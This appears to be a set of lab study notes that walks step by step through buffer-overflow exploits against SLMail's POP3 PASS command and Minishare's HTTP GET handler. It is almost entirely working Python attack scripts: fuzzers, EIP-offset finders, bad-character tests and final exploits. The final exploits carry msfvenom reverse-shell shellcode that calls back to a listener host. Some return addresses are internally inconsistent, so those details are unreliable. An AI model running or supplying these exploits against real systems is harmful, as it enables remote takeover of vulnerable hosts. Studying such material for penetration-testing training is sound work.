Comment on page
Basic Buffer Overflow
A command dump of the basic SL mail buffer overflow
SL Mail
At each stage exit the service and exit Immunity debugger
Reload application and reload Immunity debugger
Attach Immunity Debugger to the service
Press Play
==============
Step 1 - Check you can connect to the service
==============
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "\nSending Evil Buffer..."
s.connect(('192.168.56.101',110))
data = s.recv(1024)
print data
s.send('User test' +'\r\n')
data = s.recv(1024)
print data
s.send('PASS test' + '\r\n')
print data
s.close()
print "\nDone!"
except:
print "Could not connect to POP3!"
Buffer Overflow - SL-Mail
14
----Notes-----
python SLmail1.py
Sending Evil Buffer...
+OK POP3 server xp-fa9c63481a5e ready <00008.1253011@xp-fa9c63481a5e>
+OK test welcome here
Connection works
==============
Step 2 - Fuzz the application to cause a crash
==============
#!/usr/bin/python
import socket
buffer=["A"]
counter=100
while len(buffer) <= 30:
buffer.append("A"*counter)
counter=counter+200
for string in buffer:
print "Fuzzing PASS with %s bytes" % len(string)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.56.101',110))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS ' + string + '\r\n')
s.send('QUIT\r\n')
s.close()
----Notes-----
Buffer Overflow - SL-Mail
15
python SLmail2.py
Fuzzing PASS with 1 bytes
Fuzzing PASS with 100 bytes
Fuzzing PASS with 300 bytes
Fuzzing PASS with 500 bytes
Fuzzing PASS with 700 bytes
Fuzzing PASS with 900 bytes
Fuzzing PASS with 1100 bytes
Fuzzing PASS with 1300 bytes
Fuzzing PASS with 1500 bytes
Fuzzing PASS with 1700 bytes
Fuzzing PASS with 1900 bytes
Fuzzing PASS with 2100 bytes
Fuzzing PASS with 2300 bytes
Fuzzing PASS with 2500 bytes
Fuzzing PASS with 2700 bytes
Fuzzing PASS with 2900 bytes
Crash happens somewhere around the 2900 mark.
Look for EIP 41414141
==============
Step 3 - Ensure the expected fuzz causes a crash.
==============
Restart the service:
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'A' * 2700
Buffer Overflow - SL-Mail
16
try:
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not conect to POP3!"
----Notes-----
python SLmail3.py
Should crash the server overwriting with 41414141
==============
Step 4 - Locate EIP overwrite length/ offset.
==============
Create a pattern at the 2700 mark and insert it into python script as buffer.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'Aa0Aa1Aa2A-patterngoeshere-a3Aa4Aa5Aa6A'
try:
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
Buffer Overflow - SL-Mail
17
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not conect to POP3!"
----Notes-----
Note the EIP value 39694438 in Immunity Debugger.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
[*] Exact match at offset 2606
==============
Step 5 - Overwrite EIP with 4 x b (x42)
==============
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A"*2606 + "B"*4 + "C"*90
try:
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not conect to POP3!"
----Notes-----
Buffer Overflow - SL-Mail
18
Look for 42424242 at EIP register
==============
Step 6 - Check Buffer Length is long enough to hold reverse shellcode.
==============
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A"*2606 + "B"*4 + "C"*(3500-2606-4)
try:
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not conect to POP3!"
----Notes-----
This should work and give you a large amount of space
Rightclick ESP register and follow in dump and check there is lots of space over written with
x43
==============
Step 7 - Check for bad characters
==============
#!/usr/bin/python
import socket
Buffer Overflow - SL-Mail
19
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
badchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x
15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x
35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x
56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x
75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x
95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\x
b5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5
\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\x
f6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = "A"*2606 +"B"*4 + badchars
try:
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not conect to POP3!"
Buffer Overflow - SL-Mail
20
----Notes-----
Follow the ESP in dump and check for which characters cause the exploit to crash and is
mising until you have removed them all.
It should read 01 02 03 04 05 -missing- 07 which means x06 is a bad character.
Restart the debugger and the service every time you do this and rerun the script.
Note the bad characters you remove. The final three should read FD FE FF and then they
are all removed and it is not truncated.
In this case they are:
\x00\x0a\x0d\
==============
Step 8 - Locate JMP ESP
==============
In immunity debugger type
!mona modules
Choose a DLL that is FALSE FALSE FALSE FALSE TRUE
If it has no esp move to another
ie. SLMFC.dll
Upload jumpesp.exe to the host and run the following command:
findjmp.exe slmfc.dll esp
Choose a jmp esp from the list
I.e:
0x5F4BB41E3
Convert to little endian
5F | 4B | 41 | E3
\xe3\x41\x4b\x5f
Or In Immunity Debugger:
!mona find -s "\xff\xe4" -m slmfc.dll
Buffer Overflow - SL-Mail
21
=============
Step 9 - Final Overflow
=============
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -f c -e
x86/shikata_ga_nai -b "\x00\x0a\x0d"
Check x86/shikata_ga_nai encoded or you will have bad chars still in there.
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shellcode = (
"\xd9\xc8\xbe\xf1\x66\xed\xf4\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x31\x73\x17\x03\x73\x17\x83\x32\x62\x0f\x01\x48\x83\x4d"
"\xea\xb0\x54\x32\x62\x55\x65\x72\x10\x1e\xd6\x42\x52\x72\xdb"
"\x29\x36\x66\x68\x5f\x9f\x89\xd9\xea\xf9\xa4\xda\x47\x39\xa7"
"\x58\x9a\x6e\x07\x60\x55\x63\x46\xa5\x88\x8e\x1a\x7e\xc6\x3d"
"\x8a\x0b\x92\xfd\x21\x47\x32\x86\xd6\x10\x35\xa7\x49\x2a\x6c"
"\x67\x68\xff\x04\x2e\x72\x1c\x20\xf8\x09\xd6\xde\xfb\xdb\x26"
"\x1e\x57\x22\x87\xed\xa9\x63\x20\x0e\xdc\x9d\x52\xb3\xe7\x5a"
"\x28\x6f\x6d\x78\x8a\xe4\xd5\xa4\x2a\x28\x83\x2f\x20\x85\xc7"
"\x77\x25\x18\x0b\x0c\x51\x91\xaa\xc2\xd3\xe1\x88\xc6\xb8\xb2"
"\xb1\x5f\x65\x14\xcd\xbf\xc6\xc9\x6b\xb4\xeb\x1e\x06\x97\x63"
"\xd2\x2b\x27\x74\x7c\x3b\x54\x46\x23\x97\xf2\xea\xac\x31\x05"
"\x0c\x87\x86\x99\xf3\x28\xf7\xb0\x37\x7c\xa7\xaa\x9e\xfd\x2c"
"\x2a\x1e\x28\xe2\x7a\xb0\x83\x43\x2a\x70\x74\x2c\x20\x7f\xab"
"\x4c\x4b\x55\xc4\xe7\xb6\x3e\x2b\x5f\x80\xbf\xc3\xa2\xf0\xbe"
"\xa8\x2a\x16\xaa\xde\x7a\x81\x43\x46\x27\x59\xf5\x87\xfd\x24"
"\x35\x03\xf2\xd9\xf8\xe4\x7f\xc9\x6d\x05\xca\xb3\x38\x1a\xe0"
Buffer Overflow - SL-Mail
22
"\xdb\xa7\x89\x6f\x1b\xa1\xb1\x27\x4c\xe6\x04\x3e\x18\x1a\x3e"
"\xe8\x3e\xe7\xa6\xd3\xfa\x3c\x1b\xdd\x03\xb0\x27\xf9\x13\x0c"
"\xa7\x45\x47\xc0\xfe\x13\x31\xa6\xa8\xd5\xeb\x70\x06\xbc\x7b"
"\x04\x64\x7f\xfd\x09\xa1\x09\xe1\xb8\x1c\x4c\x1e\x74\xc9\x58"
"\x67\x68\x69\xa6\xb2\x28\x99\xed\x9e\x19\x32\xa8\x4b\x18\x5f"
"\x4b\xa6\x5f\x66\xc8\x42\x20\x9d\xd0\x27\x25\xd9\x56\xd4\x57"
"\x72\x33\xda\xc4\x73\x16")
buffer = "A"*2606 +"\xe3\x41\x4b\x5f" + "\x90"*8 + shellcode
try:
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not conect to POP3!"
Minishare
==============
Step 1 - Crash The Service
==============
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=81
print "Sending long URL"
buffer ="GET "
buffer +="\x41" * 2000
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
print "Sent! Check the server has crashed"
==============
Step 2 - Find The ESP
==============
#!/usr/bin/python
#Stage 2
#root@xps:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l
2000
import socket
Buffer Overflow - Minishare
24
target_address="192.168.56.101"
target_port=81
print "Sending long URL"
buffer ="GET "
buffer
+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1
Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4
Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8A
g9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4
Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am
0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1
Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4
Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8A
s9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3
Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5A
x6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9
Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2
Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5
Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9B
h0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5B
j6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1
Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo
3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq
6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0B
t1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv
5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7
Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0C
a1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc
3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5
Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg
9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj
4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9
Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co
0Co1Co2Co3Co4Co5Co"
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
print "Sent! Check the server has crashed"
==============
Step 3 - Overwrite EIP with B's
==============
#!/usr/bin/python
#Stage 3
#root@xps:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l
2000
#root@xps:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q
36684335
import socket
target_address="192.168.56.101"
target_port=81
print "Sending long URL"
buffer ="GET "
buffer +="A" * 1787 + "B" * 4 + "C" * (1866-1787-4)
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
print "Sent! Check the server has crashed"
==============
Step 4 - Increase Buffer Size to make sure we have room for shellcode
==============
Buffer Overflow - Minishare
26
#!/usr/bin/python
#Stage 4
#root@xps:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l
2000
#root@xps:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q
36684335
#Increase buffer size to see if our shellcode works and has enough space
import socket
target_address="192.168.56.101"
target_port=81
print "Sending long URL"
buffer ="GET "
buffer +="A" * 1787 + "B" * 4 + "C" * 409
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
print "Sent! Check the server has crashed"
==============
Step 5 - Find return Address and remove all bad characters
==============
#!mona modules
#!mona find -s "\xff\xe4" -m user32.dll = 0x73429353
73 | 42 | 93 | 53
\x53\x93\x42\x73
See stage 7 from SLMail for finding bad characters.
Buffer Overflow - Minishare
27
==============
Step 6 - Generate New Reverse Shell
==============
#!/usr/bin/python
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -b
"\x00\x0a\x0d" -f c
import socket
shellcode = (
"\xdb\xd8\xbf\x4c\x49\x8a\x73\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x7a\x13\x03\x36\x5a\x68\x86\x3a\xb4\xee"
"\x69\xc2\x45\x8f\xe0\x27\x74\x8f\x97\x2c\x27\x3f\xd3\x60\xc4"
"\xb4\xb1\x90\x5f\xb8\x1d\x97\xe8\x77\x78\x96\xe9\x24\xb8\xb9"
"\x69\x37\xed\x19\x53\xf8\xe0\x58\x94\xe5\x09\x08\x4d\x61\xbf"
"\xbc\xfa\x3f\x7c\x37\xb0\xae\x04\xa4\x01\xd0\x25\x7b\x19\x8b"
"\xe5\x7a\xce\xa7\xaf\x64\x13\x8d\x66\x1f\xe7\x79\x79\xc9\x39"
"\x81\xd6\x34\xf6\x70\x26\x71\x31\x6b\x5d\x8b\x41\x16\x66\x48"
"\x3b\xcc\xe3\x4a\x9b\x87\x54\xb6\x1d\x4b\x02\x3d\x11\x20\x40"
"\x19\x36\xb7\x85\x12\x42\x3c\x28\xf4\xc2\x06\x0f\xd0\x8f\xdd"
"\x2e\x41\x6a\xb3\x4f\x91\xd5\x6c\xea\xda\xf8\x79\x87\x81\x94"
"\x4e\xaa\x39\x65\xd9\xbd\x4a\x57\x46\x16\xc4\xdb\x0f\xb0\x13"
"\x1b\x3a\x04\x8b\xe2\xc5\x75\x82\x20\x91\x25\xbc\x81\x9a\xad"
"\x3c\x2d\x4f\x61\x6c\x81\x20\xc2\xdc\x61\x91\xaa\x36\x6e\xce"
"\xcb\x39\xa4\x67\x61\xc0\x2f\x48\xde\xf2\xae\x20\x1d\x02\xb0"
"\x0b\xa8\xe4\xd8\x7b\xfd\xbf\x74\xe5\xa4\x4b\xe4\xea\x72\x36"
"\x26\x60\x71\xc7\xe9\x81\xfc\xdb\x9e\x61\x4b\x81\x09\x7d\x61"
"\xad\xd6\xec\xee\x2d\x90\x0c\xb9\x7a\xf5\xe3\xb0\xee\xeb\x5a"
"\x6b\x0c\xf6\x3b\x54\x94\x2d\xf8\x5b\x15\xa3\x44\x78\x05\x7d"
"\x44\xc4\x71\xd1\x13\x92\x2f\x97\xcd\x54\x99\x41\xa1\x3e\x4d"
"\x17\x89\x80\x0b\x18\xc4\x76\xf3\xa9\xb1\xce\x0c\x05\x56\xc7"
"\x75\x7b\xc6\x28\xac\x3f\xf6\x62\xec\x16\x9f\x2a\x65\x2b\xc2"
"\xcc\x50\x68\xfb\x4e\x50\x11\xf8\x4f\x11\x14\x44\xc8\xca\x64"
"\xd5\xbd\xec\xdb\xd6\x97"
)
target_address="192.168.56.101"
target_port=81
print "Sending exploit"
buffer ="GET "
buffer +="A" * 1787 + "\x53\x93\x42\x7e" + "\x90" * 20 + shellcode
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
print "Sent! Did you get a shell?"